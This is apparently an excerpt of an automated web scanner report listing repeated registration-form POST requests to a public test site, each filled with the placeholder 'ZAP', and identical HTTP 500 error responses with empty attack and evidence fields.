HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:17 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D54 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D54 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D54 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:17 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D55 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D55 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D55 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:17 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D56 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D56 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D56 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:17 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D57 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D57 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D57 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:18 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D58 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D58 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D58 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:18 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D59 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D59 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D59 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:18 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 473 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:12 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D60 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D60 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D60 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:18 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D61 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D61 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D61 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:18 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D62 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D62 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D62 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:18 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D63 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D63 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D63 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:18 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D64 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D64 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D64 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:18 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D65 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D65 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D65 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
